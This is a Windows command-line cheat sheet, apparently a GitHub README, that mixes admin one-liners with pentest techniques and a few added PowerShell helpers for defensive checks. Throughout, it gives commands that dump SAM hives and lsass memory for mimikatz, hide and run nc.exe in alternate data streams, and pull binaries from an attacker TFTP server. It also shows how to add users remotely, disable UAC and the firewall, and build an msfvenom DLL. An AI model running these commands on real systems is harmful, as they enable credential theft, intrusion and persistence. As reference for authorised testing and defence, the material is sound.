# Windows one line commands that make life easier, shortcuts and command line fu.
### List ARP/neighbor cache entries (IPv4 only)
C:\>netsh interface ipv4 show neighbors
### List wireless networks in BSSID mode (one line per access point, with BSSID, signal & channel)
C:\>netsh wlan show networks mode=b
### Show only the IPv4/IPv6 address lines from ipconfig
Save the following in ip.bat in %PATH%
C:\>ipconfig | find /I "pv"
Call ip from CLI
### Show the binary path, start type & account for every service (sc query + sc qc)
for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j
### Save the SAM hive to a file (needs admin; pair with HKLM\SYSTEM to recover hashes offline)
C:\>reg save HKLM\SAM "%temp%\SAM.reg"
### Enable Remote Desktop connections via the registry (needs admin; a firewall rule may still block 3389)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
### Enable boot logging (records which drivers load at next boot)
bcdedit /set bootlog yes
Read via %windir%\ntbtlog.txt
### Create a system restore point from PowerShell
PS C:\>Checkpoint-Computer -description "Restore point!"
### Check whether the current token holds SeDebugPrivilege
C:\> whoami /priv | findstr "Debug"
For all privs:
C:\> whoami /priv
### Enable or disable a local user account
C:\>net user test /active:yes (or /active:no)
Get full help on the net user command:
C:\>net help user
### Show the process with the largest working set
PS C:\> (Get-Process | Sort-Object -Descending WS)[0]
### Write a file into an Alternate Data Stream of another file
C:\>type data.txt > C:\windows\explorer.exe:newads.txt
### Dump the process list as CSV
C:\> tasklist /FO CSV > tasks.txt
### Lock the workstation
C:\> rundll32 user32.dll,LockWorkStation
### Open Explorer with a given file selected
C:\> explorer /select,C:\MyData\sample.docx
### Dump the memory of a running VirtualBox guest to an ELF core file
C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf
### Set the system time zone
C:\> tzutil /s "Eastern Standard Time"
List available Time zones:
C:\> tzutil /l
### Create a directory inside a `VirtualBox` guest using guestcontrol
C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"
### Copy a binary to every host in `ips.txt` and run it as SYSTEM using psexec
C:\> psexec @ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe
### Share C:\Apps as `Apps`, with read access & limit to 10 conns
C:\> net share Apps=C:\Apps /G:everyone,READ /US:10
### List drives
C:\> fsutil.exe fsinfo drives
### Trace the route with per-hop loss/latency, without resolving names
C:\> pathping -n www.google.com
### List unsigned DLLs loaded by a process (Sysinternals listdlls)
For a system wide list, remove the process name
C:\> listdlls -u explorer.exe
### Find domain computers still running XP (ActiveDirectory PS module, `Server2008` & higher)
PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}
### Open System Properties with the `Advanced` tab selected
Change the number for different tabs
C:\> control sysdm.cpl,,3
### Use the `dir` command to find Alternate Data Streams
C:\> dir /R | find ":$D"
Using streams sysinternals (shows path):
C:\> streams -s .
**Every stream line ends in `:$DATA`, so this lists all ADS; `Zone.Identifier` streams on downloaded files are normal**
### Use `procdump` to obtain the `lsass` process memory, then use mimikatz `minidump` to get passwords
C:\> procdump -accepteula -ma lsass.exe mini.dmp
Run `mimikatz` in `minidump` mode & use `mini.dmp` from `procdump`
mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords
**Needs SeDebugPrivilege; LSA Protection (RunAsPPL) blocks the dump and Credential Guard keeps the secrets out of it**
### Get list of startup programs using wmic
C:> wmic startup list full
**wmic is deprecated and absent from recent Windows 11 builds; `Get-CimInstance Win32_StartupCommand` is the PowerShell equivalent**
### Add a binary to an Alternate Data Stream
C:> type c:\tools\nc.exe > c:\nice.png:nc.exe
Execute it (XP/2K3):
C:> start c:\nice.png:nc.exe
### Execute a binary Alternate Data Stream Win 7/2008 using wmic
C:> wmic process call create C:\nice.png:nc.exe
### Show config & state info for Network Access Protection enabled client
https://technet.microsoft.com/en-us/library/cc730902(v=ws.10).aspx
C:> netsh nap client show configuration
### Get computer system information, including domain name and memory, using wmic
C:> wmic computersystem list /format:csv
### Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
C:> pkgmgr /iu:"TelnetClient"
### Secure delete a file/folder in Windows
**Sysinternals**
C:> sdelete -p 10 a.txt
To recursively delete folders (`-s` recurses; `-p` is the number of overwrite passes):
C:> sdelete -p 10 -s C:\data\
**Overwrite passes give no guarantee on SSDs (wear levelling, remapped blocks); full-disk encryption is the reliable control**
### Show all startup entries while hiding Microsoft entries. CSV output
**It covers more locations than Windows inbuilt tools**
C:> autorunsc -m -c
### Download files via commandline using PS
PS C:> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
### Fetch the last 10 entries from the Windows Security event log, in text format
C:> wevtutil qe Security /c:10 /f:Text
**def is XML**
### Create a dll that runs calc on invoke
msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll
With current Metasploit (msfpayload/msfencode were replaced by msfvenom):
msfvenom -p windows/exec CMD=calc.exe -f dll -o rcalc.dll
C:> rundll32.exe rcalc.dll,1
### Run a command as another user
**You will be prompted for password**
C:> runas /noprofile /user:domain\username "mmc wf.msc"
### Get shutdown/reboot events from the last 1000 log entries using PS
Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *
### Create a new snapshot of the volume that has the AD database and log files
C:> ntdsutil sn "ac i ntds" create quit quit
### Mount the snapshot
**Copy ntds.dit from snapshot & System hive from reg for pwd hashes**
C:> ntdsutil snapshot "list all" "mount 1" quit quit
### Run a process on a remote system using wmic
C:> wmic /node:ip process call create "net user dum dum /add"
### List the machines, with usernames, that were connected via RDP
C:> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
### List all process that are running on your system by remote users connected via RDP
C:> query process *
### Reset the Windows TCP\IP stack
netsh int ip reset c:\tcpresetlog.txt
### List users with SMB sessions open to this box
**Very useful during a pentest to look for domain admins connecting in**
C:> net session | find "\"
**Shows inbound sessions only; for interactive/RDP logons use `query user` or `qwinsta`**
### Set a static IP on a remote box
C:> wmic /node:remotebox nicconfig where Index=1 call EnableStatic ("192.168.1.4"), ("255.255.255.0")
### Bypass powershell execution policy restrictions
PS C:> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1
### List running processes every second on a remote box
C:> wmic /node:target process list brief /every:1
**Remove `/node:target` for localhost**
### Get a list of running processes and their command line arguments on a remote system
C:> wmic /node:target process get commandline, name
### Remotely enable and start the Volume Shadow Copy Service
C:> sc \\target config vss start= auto
C:> sc \\target start vss
### Ping multiple IPs from `ips.txt` & see live hosts
C:>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="
### Set global proxy in Windows to point to IE proxy
C:> netsh winhttp import proxy source=ie
### Enumerate list of drivers with complete path information
C:> driverquery /FO list /v
### View Group Policy Objects that have been applied to a system
**Very useful during pentests**
C:> gpresult /z /h outputfile.html
### Reset the WMI repository to what it was when the OS was installed
**Very helpful if you have a corrupt repo**
C:> winmgmt /resetrepository
### Create symbolic links in Windows Vista, 7 & higher
C:> mklink
Syntax: `mklink [/D | /H | /J] link target` (`/D` directory symlink, `/H` hard link, `/J` junction; symlinks need admin or Developer Mode, junctions do not)
### Enable the tftp client in Vista & higher
C:> ocsetup TFTP /quiet
Pull files onto a `compromised host` from your TFTP server (`attacksrv`):
C:> tftp -i attacksrv get bin.exe
### Obtain list of firewall rules on a local system
C:> netsh advfi fi sh rule name=all
**Can be combined with wmic for remote systems**
### Get name of current domain controller
C:> set log
**(prints the LOGONSERVER variable, i.e. the DC that authenticated this logon)**
C:> nltest /dcname:DOMAIN
Get list of all DCs:
C:> nltest /dclist:DOMAIN
### Look at content cached in kernel mode on IIS 7 and higher
C:> netsh http sh ca
**Useful when investigating the `MS15-034` HTTP.sys vuln**
### Quick test to check `MS15_034`
C:> curl -v -H "Range: bytes=0-18446744073709551615" "http://host/a.png" -o a.png
**HTTP 416 = Vulnerable (unpatched HTTP.sys)**
**HTTP 400 = Patched HTTP.sys**
**HTTP 20X = Not vulnerable / not HTTP.sys**
**Start the range at 0 so a correct server can always satisfy it: a range that starts beyond the end of a small file returns 416 on any web server and proves nothing. A range with a non-zero start and the same upper bound is the crash trigger; do not send it to hosts you care about**
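The same range probe as the curl line above, as an added example that is not part of the original page: it is sent over a raw socket so the header goes out exactly as written (.NET's `HttpWebRequest` rejects a `Range` upper bound beyond Int64), and the status code is mapped to a verdict. Plain HTTP only; the host name and path are assumptions. Only the `0-(2^64-1)` range is sent, because ranges with a non-zero start are the crash trigger. Run it only against hosts you are authorised to test.

```powershell
# Added example: HTTP.sys (MS15-034) range check with a verdict instead of raw curl output.
function Test-MS15034 {
    param(
        [Parameter(Mandatory)][string]$TargetHost,
        [int]$Port = 80,
        [string]$Path = '/',          # any static file served by HTTP.sys works
        [int]$TimeoutMs = 5000
    )
    $client = New-Object System.Net.Sockets.TcpClient
    $client.ReceiveTimeout = $TimeoutMs
    $client.SendTimeout    = $TimeoutMs
    $statusLine = $null
    try {
        $client.Connect($TargetHost, $Port)
        $stream  = $client.GetStream()
        # Start at 0 so a correct server can always satisfy the range (206); only an
        # unpatched HTTP.sys answers 416 here, and a patched one answers 400.
        $request = "GET $Path HTTP/1.1`r`nHost: $TargetHost`r`nRange: bytes=0-18446744073709551615`r`nConnection: close`r`n`r`n"
        $bytes   = [System.Text.Encoding]::ASCII.GetBytes($request)
        $stream.Write($bytes, 0, $bytes.Length)
        $reader  = New-Object System.IO.StreamReader($stream)
        $statusLine = $reader.ReadLine()     # e.g. "HTTP/1.1 416 Requested Range Not Satisfiable"
    } finally {
        $client.Close()
    }

    if (-not $statusLine -or $statusLine -notmatch '^HTTP/\d\.\d\s+(\d{3})') {
        return [pscustomobject]@{ Host = $TargetHost; Status = $null; Verdict = 'no HTTP status line' }
    }
    $code = [int]$Matches[1]
    $verdict = switch ($code) {
        416     { 'VULNERABLE: unpatched HTTP.sys' }
        400     { 'patched HTTP.sys (or a non-IIS server rejecting the oversized range)' }
        default { 'not vulnerable / not served by HTTP.sys' }
    }
    [pscustomobject]@{ Host = $TargetHost; Status = $code; StatusLine = $statusLine; Verdict = $verdict }
}

Test-MS15034 -TargetHost 'iis.lab.local' -Path '/a.png'
```

A 400 is ambiguous on its own: a patched HTTP.sys and a non-Microsoft server that refuses the overflowing number both answer that way, so pair the verdict with the `Server:` header or a banner grab before reporting.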
### Get a list of all open Named pipes via Powershell
PS C:> [System.IO.Directory]::GetFiles("\\.\pipe\")
### Possible `VENOM` detection on VirtualBox
C:> vboxmanage list -l vms > a.txt
**Search 'Storage' & 'Floppy'**
### List RDP sessions on local or remote in list format
PS C:> qwinsta /server:<name> | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv
**Drop `/server:<name>` for the local box**
### Get a list of service packs & hotfixes using wmic for remote systems listed in file
C:> wmic /node:@file /output:out.txt qfe list full
### Export wireless connection profiles
C:> netsh wlan export profile key=clear folder=.
**`key=clear` writes the PSK in plain text into the XML**
### Unzip using PowerShell
PS C:> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)
### Open the Network & Sharing center
control.exe /name Microsoft.NetworkandSharingCenter
**Create a shortcut of this as `ns` in `PATH` for ease**
### Remotely stop/start ftp on several systems
C:> wmic /node:@ips.txt /user:u /password:p process call create "net
### To quickly find large files using cmd
C:> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"
**Run from the dir you want**
### Print RDP connections
for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"
### List scheduled tasks & binaries
C:> schtasks /query /fo LIST /v
**Weak permissions can be exploited for `localprivilege escalation`**
### Display the "Stored User names and Passwords" window
C:> rundll32 keymgr.dll,KRShowKeyMgr
### List namespaces & classes in WMI via PowerShell
PS C:> gwmi -n root -cl __Namespace | Select name
PS C:> gwmi -n root\cimv2 -li
### Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
C:> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK
### Change file extensions recursively
**csv to xls for eg**
C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"
### List IPs of running VirtualBox machines
for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"
### Windows Privilege Escalation
[![Windows Privilege Escalation](images/windows-privilege-esclation.png)](http://www.slideshare.net/riyazwalikar/windows-privilege-escalation)
### Enumerate packages with their oem inf filenames
C:> pnputil -e
### Install a driver package using inf file
C:> pnputil -i -a path_to_inf
### Malware Hunting with Mark Russinovich and the Sysinternals
[![Malware Hunting with Mark Russinovich and the Sysinternals Tools](http://img.youtube.com/vi/80vfTA9LrBM/0.jpg)](https://www.youtube.com/watch?v=80vfTA9LrBM)
### Windows Nano Server APIs
[https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx)
### Windows wifi hotspot using cmd
Starting a wifi hotspot using Windows cmd with ssid name `hotspotname` and key `password`
C:> netsh wlan set hostednetwork mode=allow ssid=hotspotname key=password
C:> netsh wlan start hostednetwork
![Windows wifi hotspot using cmd](images/wifihotspot.jpg)
### Disable UAC via cmdline
C:> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f
### Turn off Windows firewall for all profiles
**Useful if you have a bind shell**
C:> netsh advfirewall set allprofiles state off
### List Missing Updates
PS C:> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title
### Export SAM and SYSTEM to dump password hashes offline
C:>reg save HKLM\SAM SAM
C:>reg save HKLM\SYSTEM SYSTEM
### Convert Binary to base64 string to transfer across restricted RDP
PS C:> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))
### Convert Base64 string to Binary
PS C:> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By
**`-Encoding Byte` and the `sc` alias for Set-Content exist only in Windows PowerShell 5.1; on PowerShell 7 use `-AsByteStream` and `Set-Content`, or `[IO.File]::ReadAllBytes`/`WriteAllBytes`**
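The two one-liners above as a pair of helpers (an added example, not from the original page): they work on both Windows PowerShell 5.1 and PowerShell 7, split the base64 into lines short enough to paste through a clipboard-restricted RDP session, and verify a SHA-256 before the rebuilt binary is trusted. File names under `%TEMP%` are assumptions and the input file is constructed for the demo.

```powershell
# Added example: chunked base64 transfer with an integrity check.
function ConvertTo-Base64Chunks {
    param([Parameter(Mandatory)][string]$Path, [int]$ChunkSize = 76)
    # ReadAllBytes avoids the -Encoding Byte / -AsByteStream split between PS 5.1 and 7
    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path -LiteralPath $Path).Path)
    $b64   = [Convert]::ToBase64String($bytes)
    $hash  = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    $lines = for ($i = 0; $i -lt $b64.Length; $i += $ChunkSize) {
        $b64.Substring($i, [Math]::Min($ChunkSize, $b64.Length - $i))
    }
    [pscustomobject]@{ Sha256 = $hash; Lines = @($lines) }
}

function ConvertFrom-Base64Chunks {
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [Parameter(Mandatory)][string]$OutFile,     # use an absolute path; .NET ignores PS's current location
        [string]$ExpectedSha256
    )
    # Pasted text often picks up stray whitespace; strip it before decoding
    $bytes = [Convert]::FromBase64String((($Lines -join '') -replace '\s', ''))
    [System.IO.File]::WriteAllBytes($OutFile, $bytes)
    if ($ExpectedSha256) {
        $actual = (Get-FileHash -LiteralPath $OutFile -Algorithm SHA256).Hash
        if ($actual -ne $ExpectedSha256.ToUpperInvariant()) {
            Remove-Item -LiteralPath $OutFile -Force
            throw "SHA-256 mismatch: got $actual, expected $ExpectedSha256"
        }
    }
    Get-Item -LiteralPath $OutFile
}

# Constructed demo: a 256-byte file stands in for a.exe
$src = Join-Path $env:TEMP 'a.bin'
$dst = Join-Path $env:TEMP 'a.restored.bin'
$txt = Join-Path $env:TEMP 'b64.txt'
[System.IO.File]::WriteAllBytes($src, [byte[]](0..255))

$enc = ConvertTo-Base64Chunks -Path $src
$enc.Lines | Set-Content -LiteralPath $txt          # this is what gets pasted across the RDP session
"Send this hash out of band: $($enc.Sha256)"

$rebuilt = ConvertFrom-Base64Chunks -Lines (Get-Content -LiteralPath $txt) -OutFile $dst -ExpectedSha256 $enc.Sha256
"Rebuilt $($rebuilt.Name): $($rebuilt.Length) bytes, hash verified"
```

Send the hash through a different channel than the base64 text (chat, a second session, or read it out); a pasted blob with a transposed line still decodes to valid base64, and the hash is the only thing that catches it.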
### List services running as SYSTEM whose binary lives outside Windows/Program Files (candidates for weak file permissions)
wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"
**The filter only narrows the list; check the ACL of each binary and its directory (`icacls`) before calling it a finding**
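The wmic line above leaves the ACL check to the reader. This added example (not from the original page) does it: for every service running as LocalSystem it extracts the binary from `PathName`, flags unquoted paths that contain spaces, and reports any binary or path directory that a low-privilege principal can write to. It uses `Get-CimInstance` so it still runs where wmic has been removed. The principal names are the English well-known ones (an assumption on localised systems).

```powershell
# Added example: find LocalSystem services with writable binaries or unquoted paths.
$WeakPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, ChangePermissions, TakeOwnership'

function Get-ServiceBinary([string]$PathName) {
    # Quoted: take what is inside the quotes. Unquoted: everything up to the first .exe.
    if ($PathName -match '^"([^"]+)"')            { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)(\s|$)')      { return $Matches[1] }
    return $PathName
}

function Test-WeakAcl([string]$Path) {
    # True if any Allow ACE grants a write-class right to one of the weak principals
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Find-WeakSystemServices {
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $bin      = Get-ServiceBinary $_.PathName
            $unquoted = ($_.PathName -notmatch '^"') -and ($bin -match '\s')
            # For an unquoted "C:\Program Files\Foo Bar\svc.exe" the service controller tries
            # C:\Program.exe, then C:\Program Files\Foo.exe, then the real file, so the parent
            # directory of every space-delimited prefix is a planting location.
            $dirs = if ($unquoted) {
                $parts = $bin -split '\s+'
                for ($i = 1; $i -le $parts.Count; $i++) {
                    Split-Path -Parent ($parts[0..($i - 1)] -join ' ')
                }
            } else {
                @(Split-Path -Parent $bin)
            }
            [pscustomobject]@{
                Service        = $_.Name
                Binary         = $bin
                UnquotedSpaces = $unquoted
                WritableBinary = Test-WeakAcl $bin
                WritableDirs   = @($dirs | Where-Object { $_ } | Sort-Object -Unique | Where-Object { Test-WeakAcl $_ })
            }
        }
}

Find-WeakSystemServices |
    Where-Object { $_.WritableBinary -or $_.WritableDirs.Count -gt 0 -or $_.UnquotedSpaces } |
    Format-Table Service, Binary, UnquotedSpaces, WritableBinary, WritableDirs -AutoSize
```

An unquoted path is only exploitable when one of the listed directories is actually writable, which is why the output carries both columns; `C:\` itself is not writable by standard users on a default install, so most unquoted-path hits turn out to be noise.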
### Check Bitlocker status on a remote box
manage-bde -status -cn <computername>
Use `wmic /node:@ips.txt` & the `process` alias for multiple.
### Export failed logon attempts
PS C:> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv
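Exporting every FailureAudit record leaves the analysis to a spreadsheet. This added example (not from the original page) pulls event 4625 for the last N hours, parses the EventData XML, and summarises attempts by source address and logon type so a brute-force (many attempts, one account) or a password spray (many accounts, one attempt each) stands out. Needs an elevated prompt; the 5-attempt threshold is an assumption.

```powershell
# Added example: summarise failed logons (4625) by source to spot brute force / spraying.
function Get-FailedLogonSummary {
    param([int]$Hours = 24, [int]$MinCount = 5)

    $filter = @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # EventData is a list of <Data Name="...">value</Data>; turn it into a hashtable
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Source    = if ($d['IpAddress'] -and $d['IpAddress'] -ne '-') { $d['IpAddress'] } else { $d['WorkstationName'] }
            Target    = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
            LogonType = $d['LogonType']      # 3 = network, 10 = RDP, 2 = interactive
            SubStatus = $d['SubStatus']      # 0xC000006A bad password, 0xC0000064 no such user
        }
    } |
    Group-Object Source, LogonType |
    Where-Object Count -ge $MinCount |
    ForEach-Object {
        [pscustomobject]@{
            Source     = $_.Group[0].Source
            LogonType  = $_.Group[0].LogonType
            Attempts   = $_.Count
            Accounts   = @($_.Group.Target | Sort-Object -Unique).Count
            BadUserPct = [int](100 * @($_.Group | Where-Object SubStatus -eq '0xc0000064').Count / $_.Count)
            First      = ($_.Group.Time | Measure-Object -Minimum).Minimum
            Last       = ($_.Group.Time | Measure-Object -Maximum).Maximum
        }
    } |
    Sort-Object Attempts -Descending
}

Get-FailedLogonSummary -Hours 24 -MinCount 5 | Format-Table -AutoSize
```

A row with a high `Attempts` count and `Accounts` close to that count is a spray; a high count with `Accounts` of 1 is a brute force; a high `BadUserPct` means the attacker is guessing usernames as well as passwords.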
### Alternate Data Streams and PS
- List all ADS for all files in current dir
PS C:> gi * -s *
- Read ADS
PS C:> gc file.txt -s streamname
- Create ADS using text input
PS C:> sc file.txt -s streamname -v "text"
- Delete ADS
PS C:> ri file.txt -s streamname
**`-s` is `-Stream`; `:$DATA` in the listing is the file's own content, not an ADS. `sc` is the Set-Content alias in Windows PowerShell 5.1 only**
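The `dir /R` and `gi -s *` listings above show every stream, including the harmless `Zone.Identifier` marker browsers attach to downloads. This added example (not from the original page) walks a tree, drops the `:$DATA` main stream, flags any stream that is not `Zone.Identifier`, and peeks at the first two bytes for an `MZ` header, which is what the `nice.png:nc.exe` trick earlier on the page leaves behind. It runs on Windows PowerShell 5.1 and PowerShell 7; the demo file under `%TEMP%` is constructed for the example.

```powershell
# Added example: hunt for alternate data streams that are not browser zone markers.
$IsCore = $PSVersionTable.PSVersion.Major -ge 6

function Read-StreamHead {
    # First two bytes of a named stream, using whichever byte-mode switch this PS version has
    param([string]$File, [string]$Stream)
    try {
        if ($IsCore) { Get-Content -LiteralPath $File -Stream $Stream -AsByteStream -TotalCount 2 -ErrorAction Stop }
        else         { Get-Content -LiteralPath $File -Stream $Stream -Encoding Byte -TotalCount 2 -ErrorAction Stop }
    } catch { @() }
}

function Find-SuspiciousADS {
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object {
        # -Stream * returns one object per stream; ':$DATA' is the file's own content
        Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' } |
            ForEach-Object {
                $head = @(Read-StreamHead -File $_.FileName -Stream $_.Stream)
                [pscustomobject]@{
                    File       = $_.FileName
                    Stream     = $_.Stream
                    Bytes      = $_.Length
                    Suspicious = ($_.Stream -ne 'Zone.Identifier')
                    MZHeader   = ($head.Count -eq 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)
                }
            }
    }
}

# Constructed sample: a harmless text file carrying a hidden stream that starts with 'MZ'
$sample = Join-Path $env:TEMP 'ads-demo.txt'
Set-Content -LiteralPath $sample -Value 'nothing to see here'
Set-Content -LiteralPath $sample -Stream 'payload.bin' -Value 'MZ-not-really-a-PE' -NoNewline

Find-SuspiciousADS -Root $env:TEMP | Where-Object Suspicious | Format-Table -AutoSize
```

Zone.Identifier streams on files that were never downloaded, or that are larger than a few hundred bytes, are also worth a look: the name is a convenient place to hide data precisely because most scanners ignore it.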
### Run the Windows Assessment tool for cpu, ram and disk
C:> winsat cpuformal -v
C:> winsat memformal -v
C:> winsat diskformal -v
### Port forward (proxy) traffic to remote host and port
C:> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]
### Enable/Disable NetBIOS over TCP/IP
Step 1. Get the index of the network adapter:
C:> wmic nicconfig get caption,index
Step 2. Use the index:
C:> wmic nicconfig where index=1 call SetTcpipNetbios 1
**0 = Default (from DHCP), 1 = Enable, 2 = Disable**
### Compact multiple VDI files across folders
C:> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i
### Full scan using WinDefender
C:>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2
Use `wmic /node:@ips process call create` for multiple.
### Generate 32 char random password
Save as genpass.ps1
PS C:> ([char[]](33..126) | sort {Get-Random})[0..31] -join ''
**Shuffles the printable ASCII set and takes the first 32, so no character repeats and `Get-Random` is not a cryptographic generator; fine for a throwaway lab password, not for a secret that has to last**
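The one-liner above shuffles a fixed set with `Get-Random`, which is seeded from a non-cryptographic PRNG and can only ever produce permutations of that set (no repeated characters). This added example (not from the original page) draws each position independently from the OS CSPRNG and uses rejection sampling so the modulo step does not bias short alphabets. The alphabets are assumptions.

```powershell
# Added example: CSPRNG-backed password generation with rejection sampling.
function New-RandomPassword {
    param(
        [int]$Length = 32,
        # default: printable ASCII '!' .. '~' (94 symbols)
        [string]$Alphabet = ([char[]](33..126) -join '')
    )
    if ($Alphabet.Length -lt 2 -or $Alphabet.Length -gt 256) { throw 'alphabet must have 2..256 characters' }

    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $buf = New-Object byte[] 1
    # Bytes >= $limit would make the low residues slightly more likely; throw them away instead
    $limit = 256 - (256 % $Alphabet.Length)
    $sb = New-Object System.Text.StringBuilder
    try {
        while ($sb.Length -lt $Length) {
            $rng.GetBytes($buf)
            if ($buf[0] -lt $limit) {
                [void]$sb.Append($Alphabet[$buf[0] % $Alphabet.Length])
            }
        }
    } finally { $rng.Dispose() }
    $sb.ToString()
}

New-RandomPassword
# Alphabet without look-alikes (0/O, 1/l/I) for passwords that will be typed by hand
New-RandomPassword -Length 20 -Alphabet 'abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789'
```

With the 94-symbol default, 32 characters give roughly 210 bits of entropy; the 57-symbol typed alphabet at 20 characters still gives about 117, which is more than any online guessing attack can touch.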
---
## Contribution
Please read the [contribution guidelines](CONTRIBUTING.md) if you want to contribute.